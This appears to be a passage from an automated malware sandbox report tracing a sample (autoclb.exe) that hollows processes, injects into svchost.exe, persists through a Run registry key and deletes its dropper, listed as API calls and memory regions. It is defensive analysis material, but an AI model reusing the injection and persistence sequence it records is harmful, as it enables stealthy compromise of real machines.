Open STD_ERROR_HANDLE - True 1
Fn
Read C:\Windows\SYSTEM32\ntdll.dll size = 1533496, size_out = 1533496 True 3
Fn
Read C:\Windows\SYSTEM32\ntdll.dll size = 1533496, size_out = 1533496 True 4
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe os_pid = 0xfb8, creation_flags = CREATE_SUSPENDED, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
Thread (3)
»
Operation Process Additional Information Success Count Logfile
Get Context c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe os_tid = 0xfac True 1
Fn
Set Context c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe os_tid = 0xfac True 1
Fn
Resume c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe os_tid = 0xfac True 1
Fn
Memory (2)
»
Operation Process Additional Information Success Count Logfile
Read C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe address = 0x7ffde008, size = 4 True 1
Fn
Data
Write C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe address = 0x7ffde008, size = 4 True 1
Fn
Data
Module (14)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75260000 True 2
Fn
Get Filename - process_name = c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe, size = 260 True 1
Fn
Get Filename - process_name = c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe, size = 259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x7527a330 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75277580 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75279910 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7527f400 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75278b70 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x752874f0 True 1
Fn
Create Mapping - protection = PAGE_EXECUTE_READWRITE, maximum_size = 1642368 True 1
Fn
Map - process_name = C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x400000 True 1
Fn
Map - process_name = c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1f10000 True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #7: autoclb.exe
108 0
»
Information Value
ID #7
File Name c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe
Command Line "C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe"
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:01:09, Reason: Child Process
Unmonitor End Time: 00:01:18, Reason: Self Terminated
Monitor Duration 00:00:09
OS Process Information
»
Information Value
PID 0xfb8
Parent PID 0xfa8 (c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x FBC
0x FC0
0x FC4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory rw True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory r True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory rw True False False -
private_0x0000000000060000 0x00060000 0x0015ffff Private Memory rw True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory rw True False False -
private_0x0000000000160000 0x00160000 0x00160fff Private Memory rw True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory r True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory rw True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory rw True False False -
private_0x0000000000210000 0x00210000 0x00210fff Private Memory rw True False False -
private_0x0000000000220000 0x00220000 0x0022ffff Private Memory rw True False False -
locale.nls 0x00230000 0x002edfff Memory Mapped File r False False False -
private_0x00000000002f0000 0x002f0000 0x003effff Private Memory rw True False False -
autoclb.exe 0x00400000 0x00512fff Memory Mapped File rwx True False False -
pagefile_0x0000000000400000 0x00400000 0x00470fff Pagefile Backed Memory rwx True False False -
private_0x0000000000480000 0x00480000 0x004bffff Private Memory rw True False False -
private_0x00000000004d0000 0x004d0000 0x004dffff Private Memory rw True False False -
private_0x00000000004e0000 0x004e0000 0x005dffff Private Memory rw True False False -
private_0x0000000000610000 0x00610000 0x0070ffff Private Memory rw True False False -
pagefile_0x0000000000710000 0x00710000 0x00897fff Pagefile Backed Memory r True False False -
pagefile_0x00000000008a0000 0x008a0000 0x00a20fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000a30000 0x00a30000 0x01e2ffff Pagefile Backed Memory r True False False -
private_0x0000000001e30000 0x01e30000 0x0223ffff Private Memory rw True False False -
sortdefault.nls 0x02240000 0x02576fff Memory Mapped File r False False False -
private_0x0000000002580000 0x02580000 0x02741fff Private Memory rw True False False -
pagefile_0x0000000002580000 0x02580000 0x026b2fff Pagefile Backed Memory rwx True False False -
private_0x00000000026c0000 0x026c0000 0x02881fff Private Memory rw True False False -
wow64cpu.dll 0x64ae0000 0x64ae7fff Memory Mapped File rwx False False False -
wow64win.dll 0x64af0000 0x64b62fff Memory Mapped File rwx False False False -
wow64.dll 0x64b70000 0x64bbefff Memory Mapped File rwx False False False -
devobj.dll 0x74b10000 0x74b30fff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x74d40000 0x74d98fff Memory Mapped File rwx False False False -
cryptbase.dll 0x74da0000 0x74da9fff Memory Mapped File rwx False False False -
sspicli.dll 0x74db0000 0x74dcdfff Memory Mapped File rwx False False False -
kernelbase.dll 0x74e70000 0x74fe5fff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x75220000 0x75255fff Memory Mapped File rwx False False False -
kernel32.dll 0x75260000 0x7534ffff Memory Mapped File rwx False False False -
powrprof.dll 0x753b0000 0x753f3fff Memory Mapped File rwx False False False -
imm32.dll 0x75400000 0x7542afff Memory Mapped File rwx False False False -
shell32.dll 0x75430000 0x767eefff Memory Mapped File rwx False False False -
profapi.dll 0x76810000 0x7681efff Memory Mapped File rwx False False False -
ole32.dll 0x768b0000 0x76999fff Memory Mapped File rwx False False False -
advapi32.dll 0x76a10000 0x76a8afff Memory Mapped File rwx False False False -
setupapi.dll 0x76a90000 0x76c34fff Memory Mapped File rwx False False False -
sechost.dll 0x76c40000 0x76c82fff Memory Mapped File rwx False False False -
msasn1.dll 0x76d30000 0x76d3dfff Memory Mapped File rwx False False False -
wintrust.dll 0x76d40000 0x76d81fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x76d90000 0x76e3bfff Memory Mapped File rwx False False False -
combase.dll 0x76e40000 0x76ff9fff Memory Mapped File rwx False False False -
gdi32.dll 0x77000000 0x7714cfff Memory Mapped File rwx False False False -
user32.dll 0x77150000 0x7728ffff Memory Mapped File rwx False False False -
shlwapi.dll 0x77290000 0x772d3fff Memory Mapped File rwx False False False -
shcore.dll 0x77340000 0x773ccfff Memory Mapped File rwx False False False -
windows.storage.dll 0x773f0000 0x778ccfff Memory Mapped File rwx False False False -
msctf.dll 0x778d0000 0x779effff Memory Mapped File rwx False False False -
msvcrt.dll 0x779f0000 0x77aadfff Memory Mapped File rwx False False False -
crypt32.dll 0x77ab0000 0x77c24fff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x77c30000 0x77c3bfff Memory Mapped File rwx False False False -
ntdll.dll 0x77ca0000 0x77e18fff Memory Mapped File rwx False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd5000 0x7ffd5000 0x7ffd7fff Private Memory rw True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff8ee37ffff Private Memory r True False False -
ntdll.dll 0x7ff8ee380000 0x7ff8ee541fff Memory Mapped File rwx False False False -
private_0x00007ff8ee542000 0x7ff8ee542000 0x7ffffffeffff Private Memory r True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe 0xfac address = 0x400000, size = 462848 True 1
Fn
Modify Memory #6: c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe 0xfac address = 0x7ffde008, size = 4 True 1
Fn
Data
Modify Control Flow #6: c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe 0xfac os_tid = 0xfbc, address = 0x77d0aef0 True 1
Fn
Host Behavior
File (9)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\98F9CE91 desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Windows\system32\c_1252.nls desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 3
Fn
Create Directory C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw - False 1
Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1
Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1
Fn
Get Info C:\Windows\system32\c_1252.nls type = time True 1
Fn
Delete C:\Users\CIIHMN~1\Desktop\educat.exe - True 1
Fn
Registry (12)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_USERS - True 1
Fn
Open Key HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = InstallDate, data = 65 True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = cabilipc, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\adsldraw\autoclb.exe, type = REG_SZ True 1
Fn
Read Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders value_name = AppData, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_USERS\S-1-5-21-1462094071-1423818996-289466292-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders value_name = AppData, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_USERS - True 1
Fn
Enumerate Keys HKEY_USERS - True 1
Fn
Enumerate Keys HKEY_USERS - True 1
Fn
Enumerate Keys HKEY_USERS - True 1
Fn
Process (3)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\svchost.exe os_pid = 0xfd8, creation_flags = CREATE_SUSPENDED, CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_SET_SESSIONID, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_DUP_HANDLE, PROCESS_CREATE_PROCESS, PROCESS_SET_QUOTA, PROCESS_SET_INFORMATION, PROCESS_QUERY_INFORMATION, PROCESS_SUSPEND_RESUME, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE True 1
Fn
Thread (6)
»
Operation Process Additional Information Success Count Logfile
Suspend c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe os_tid = 0xfc4 True 1
Fn
Get Context c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe os_tid = 0xfc4 True 2
Fn
Set Context c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe os_tid = 0xfc4 True 1
Fn
Resume c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe os_tid = 0xfc4 True 2
Fn
Memory (5)
»
Operation Process Additional Information Success Count Logfile
Allocate C:\Windows\system32\svchost.exe address = 0x5df0c0, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 6156476 True 1
Fn
Protect C:\Windows\system32\svchost.exe address = 0x7ff673b43440, protection = PAGE_EXECUTE_READWRITE, size = 6157816 True 1
Fn
Protect C:\Windows\system32\svchost.exe address = 0x7ff673b43000, protection = PAGE_EXECUTE_READ, size = 6157816 True 1
Fn
Write C:\Windows\system32\svchost.exe address = 0x700000, size = 792 True 1
Fn
Data
Write C:\Windows\system32\svchost.exe address = 0x7ff673b43440, size = 4 True 1
Fn
Data
Module (48)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe base_address = 0x400000 True 3
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75260000 True 2
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x77150000 True 2
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77ca0000 True 17
Fn
Get Filename c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe process_name = c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x752796e0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetWindowThreadProcessId, address_out = 0x7716ba70 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Wow64EnableWow64FsRedirection, address_out = 0x7529b6a0 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwWow64QueryInformationProcess64, address_out = 0x77d0a840 True 15
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwWow64ReadVirtualMemory64, address_out = 0x77d0a860 True 1
Fn
Create Mapping - protection = PAGE_EXECUTE_READWRITE, maximum_size = 6157784 True 1
Fn
Map - process_name = c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x2580000 True 1
Fn
Map - process_name = C:\Windows\system32\svchost.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x5c0000 True 1
Fn
Window (2)
»
Operation Window Name Additional Information Success Count Logfile
Find - class_name = ProgMan True 2
Fn
System (17)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = LHNIWSJ True 1
Fn
Sleep duration = 500 milliseconds (0.500 seconds) True 10
Fn
Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Get Time type = Ticks, time = 150796 True 1
Fn
Get Info type = Operating System True 1
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Operating System False 1
Fn
Process #8: svchost.exe
173 0
»
Information Value
ID #8
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:01:16, Reason: Child Process
Unmonitor End Time: 00:01:21, Reason: Self Terminated
Monitor Duration 00:00:05
OS Process Information
»
Information Value
PID 0xfd8
Parent PID 0xfb8 (c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x FDC
0x FE0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x00000000005c0000 0x005c0000 0x006f2fff Pagefile Backed Memory rwx True False False -
private_0x0000000000700000 0x00700000 0x00700fff Private Memory rwx True False False -
private_0x000000007f53f000 0x7f53f000 0x7f53ffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x0000009eda5c0000 0x9eda5c0000 0x9eda5dffff Private Memory rw True False False -
pagefile_0x0000009eda5c0000 0x9eda5c0000 0x9eda5cffff Pagefile Backed Memory rw True False False -
svchost.exe.mui 0x9eda5d0000 0x9eda5d0fff Memory Mapped File r False False False -
pagefile_0x0000009eda5e0000 0x9eda5e0000 0x9eda5f3fff Pagefile Backed Memory r True False False -
private_0x0000009eda600000 0x9eda600000 0x9eda67ffff Private Memory rw True False False -
pagefile_0x0000009eda680000 0x9eda680000 0x9eda683fff Pagefile Backed Memory r True False False -
pagefile_0x0000009eda690000 0x9eda690000 0x9eda690fff Pagefile Backed Memory r True False False -
private_0x0000009eda6a0000 0x9eda6a0000 0x9eda6a1fff Private Memory rw True False False -
private_0x0000009eda6b0000 0x9eda6b0000 0x9eda72ffff Private Memory rw True False False -
private_0x0000009eda730000 0x9eda730000 0x9eda730fff Private Memory rw True False False -
private_0x0000009eda740000 0x9eda740000 0x9eda746fff Private Memory rw True False False -
imm32.dll 0x9eda750000 0x9eda783fff Memory Mapped File r False False False -
private_0x0000009eda750000 0x9eda750000 0x9eda750fff Private Memory rw True False False -
private_0x0000009eda800000 0x9eda800000 0x9eda8fffff Private Memory rw True False False -
locale.nls 0x9eda900000 0x9eda9bdfff Memory Mapped File r False False False -
private_0x0000009eda9c0000 0x9eda9c0000 0x9edab4cfff Private Memory rw True False False -
private_0x0000009eda9c0000 0x9eda9c0000 0x9edaa6cfff Private Memory rw True False False -
private_0x0000009edab40000 0x9edab40000 0x9edab4cfff Private Memory rw True False False -
private_0x0000009edab50000 0x9edab50000 0x9edad4ffff Private Memory rw True False False -
private_0x0000009edac00000 0x9edac00000 0x9edacfffff Private Memory rw True False False -
pagefile_0x0000009edad00000 0x9edad00000 0x9edae87fff Pagefile Backed Memory r True False False -
pagefile_0x0000009edae90000 0x9edae90000 0x9edb010fff Pagefile Backed Memory r True False False -
pagefile_0x0000009edb020000 0x9edb020000 0x9edc41ffff Pagefile Backed Memory r True False False -
private_0x0000009edc420000 0x9edc420000 0x9edc61ffff Private Memory rw True False False -
private_0x0000009edc500000 0x9edc500000 0x9edc5fffff Private Memory rw True False False -
pagefile_0x00007df5ffa70000 0x7df5ffa70000 0x7ff5ffa6ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff673330000 0x7ff673330000 0x7ff67342ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff673430000 0x7ff673430000 0x7ff673452fff Pagefile Backed Memory r True False False -
private_0x00007ff673454000 0x7ff673454000 0x7ff673454fff Private Memory rw True False False -
private_0x00007ff67345c000 0x7ff67345c000 0x7ff67345dfff Private Memory rw True False False -
private_0x00007ff67345e000 0x7ff67345e000 0x7ff67345ffff Private Memory rw True False False -
svchost.exe 0x7ff673b40000 0x7ff673b4cfff Memory Mapped File rwx False False False -
msvfw32.dll 0x7ff8d4970000 0x7ff8d4998fff Memory Mapped File rwx False False False -
comctl32.dll 0x7ff8d4c40000 0x7ff8d4ce9fff Memory Mapped File rwx False False False -
msacm32.dll 0x7ff8d50b0000 0x7ff8d50cbfff Memory Mapped File rwx False False False -
avifil32.dll 0x7ff8d50d0000 0x7ff8d50effff Memory Mapped File rwx False False False -
winmmbase.dll 0x7ff8db910000 0x7ff8db93bfff Memory Mapped File rwx False False False -
winmm.dll 0x7ff8db940000 0x7ff8db962fff Memory Mapped File rwx False False False -
devobj.dll 0x7ff8e9720000 0x7ff8e9746fff Memory Mapped File rwx False False False -
powrprof.dll 0x7ff8eadd0000 0x7ff8eae19fff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x7ff8eae20000 0x7ff8eae2efff Memory Mapped File rwx False False False -
profapi.dll 0x7ff8eae30000 0x7ff8eae42fff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x7ff8eaf60000 0x7ff8eafa3fff Memory Mapped File rwx False False False -
windows.storage.dll 0x7ff8eb180000 0x7ff8eb7a7fff Memory Mapped File rwx False False False -
shcore.dll 0x7ff8eb7b0000 0x7ff8eb862fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7ff8eb870000 0x7ff8eba4cfff Memory Mapped File rwx False False False -
user32.dll 0x7ff8ebdc0000 0x7ff8ebf0dfff Memory Mapped File rwx False False False -
msctf.dll 0x7ff8ec0c0000 0x7ff8ec21bfff Memory Mapped File rwx False False False -
sechost.dll 0x7ff8ec240000 0x7ff8ec29afff Memory Mapped File rwx False False False -
ole32.dll 0x7ff8ec300000 0x7ff8ec440fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7ff8ec450000 0x7ff8ec575fff Memory Mapped File rwx False False False -
shell32.dll 0x7ff8ec580000 0x7ff8edaa4fff Memory Mapped File rwx False False False -
gdi32.dll 0x7ff8edbc0000 0x7ff8edd44fff Memory Mapped File rwx False False False -
combase.dll 0x7ff8edd60000 0x7ff8edfdbfff Memory Mapped File rwx False False False -
shlwapi.dll 0x7ff8edfe0000 0x7ff8ee030fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff8ee0b0000 0x7ff8ee14cfff Memory Mapped File rwx False False False -
imm32.dll 0x7ff8ee150000 0x7ff8ee185fff Memory Mapped File rwx False False False -
advapi32.dll 0x7ff8ee190000 0x7ff8ee235fff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff8ee2d0000 0x7ff8ee37cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff8ee380000 0x7ff8ee541fff Memory Mapped File rwx False False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #7: c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe 0xfc4 address = 0x5c0000, size = 1257472 True 1
Fn
Modify Memory #7: c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe 0xfc4 address = 0x700000, size = 792 True 1
Fn
Data
Modify Control Flow #7: c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe 0xfc4 os_tid = 0xfdc, address = 0x73454000 True 1
Fn
Modify Memory #7: c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe 0xfc4 address = 0x7ff673b43440, size = 4 True 1
Fn
Data
Host Behavior
Module (173)
»
Operation Module Additional Information Success Count Logfile
Load ntdll.dll base_address = 0x0 True 1
Fn
Load KERNEL32.dll base_address = 0x0 True 1
Fn
Load AVIFIL32.dll - False 1
Fn
Get Address - function = NtCreateSection, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = NtUnmapViewOfSection, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = NtMapViewOfSection, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = ZwOpenProcessToken, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = ZwClose, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = ZwQueryInformationToken, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = ZwOpenProcess, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = NtQuerySystemInformation, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = RtlNtStatusToDosError, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = ZwQueryInformationProcess, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = RtlImageDirectoryEntryToData, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = _wcsupr, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = _strupr, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = memmove, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = bsearch, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = _vsnwprintf, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = _strlwr, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = atoi, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = strstr, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = wcscpy, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = ZwQueryKey, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = RtlUpcaseUnicodeString, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = RtlFreeUnicodeString, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = sprintf, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = _snprintf, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = memset, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = memcpy, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = strcpy, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = RtlAdjustPrivilege, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = mbstowcs, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = RtlImageNtHeader, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = memcmp, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = __C_specific_handler, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = __chkstk, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetLocalTime, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = OpenProcess, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = VirtualQueryEx, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CreateRemoteThread, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetModuleFileNameW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetVersion, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = SetEndOfFile, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = RemoveDirectoryW, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetTempFileNameA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = DeleteCriticalSection, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CloseHandle, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = WriteProcessMemory, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CreateFileA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = lstrcmpiA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetModuleFileNameA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetCurrentProcess, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = lstrcmpA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GetModuleHandleA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = CreateFileMappingA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = MapViewOfFile, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = Sleep, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GlobalLock, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = lstrlenA, ordinal = 0, address_out = 0x9eda67f910 True 1
Fn
Get Address - function = GlobalAlloc, ordinal = 0, address_out = 0x9eda67f910 True 1
